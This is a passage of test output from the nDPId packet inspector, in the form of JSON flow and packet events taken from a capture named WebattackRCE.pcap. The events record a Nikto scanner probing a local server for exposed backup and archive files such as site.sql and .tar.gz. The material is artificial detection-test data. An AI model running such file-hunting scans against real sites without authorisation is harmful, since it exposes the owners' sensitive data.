{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1576420277307,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277307,"pkt":"AAAAAAAAAAAAAAAACABFAADBE+BAAEAGKFV\/AAABfwAAAcSoH5A\/FCtx8eapa4AYAED+tQAAAQEICp1m\/WOdZv1jR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1576420277308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277308,"pkt":"AAAAAAAAAAAAAAAACABFAADBd5tAAEAGxJl\/AAABfwAAAcSqH5Asxk83LE5RU4AYAED+tQAAAQEICp1m\/WSdZv1kR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1576420277309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277309,"pkt":"AAAAAAAAAAAAAAAACABFAADB9HRAAEAGR8B\/AAABfwAAAcSsH5BlTMzeEpcpJ4AYAED+tQAAAQEICp1m\/WWdZv1lR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1576420277310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277310,"pkt":"AAAAAAAAAAAAAAAACABFAADFcQdAAEAGyyl\/AAABfwAAAcSuH5C\/jUmrZ8IhxYAYAED+uQAAAQEICp1m\/WadZv1mR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1576420277311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277311,"pkt":"AAAAAAAAAAAAAAAACABFAADFdZ1AAEAGxpN\/AAABfwAAAcSwH5BGIE0sZXhTqYAYAED+uQAAAQEICp1m\/WedZv1nR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1576420277313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277313,"pkt":"AAAAAAAAAAAAAAAACABFAADESF9AAEAG89J\/AAABfwAAAcSyH5CXAnDudCS+HoAYAED+uAAAAQEICp1m\/WmdZv1oR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1576420277314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277314,"pkt":"AAAAAAAAAAAAAAAACABFAADEBf5AAEAGNjR\/AAABfwAAAcS0H5ApMj1NA0MOSIAYAED+uAAAAQEICp1m\/WqdZv1qR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1576420277315,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277315,"pkt":"AAAAAAAAAAAAAAAACABFAADC35NAAEAGXKB\/AAABfwAAAcS2H5BI6+ciGxVy6IAYAED+tgAAAQEICp1m\/WudZv1rR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1576420277317,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277317,"pkt":"AAAAAAAAAAAAAAAACABFAADCBO9AAEAGN0V\/AAABfwAAAcS4H5BQkTxdjeN4aIAYAED+tgAAAQEICp1m\/W2dZv1tR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1576420277319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277319,"pkt":"AAAAAAAAAAAAAAAACABFAADAyGZAAEAGc89\/AAABfwAAAcS6H5BukfDWpxxv14AYAED+tAAAAQEICp1m\/W+dZv1vR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1576420277321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277321,"pkt":"AAAAAAAAAAAAAAAACABFAADAwiFAAEAGehR\/AAABfwAAAcS8H5DDVvqu6KD2KYAYAED+tAAAAQEICp1m\/XGdZv1xR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 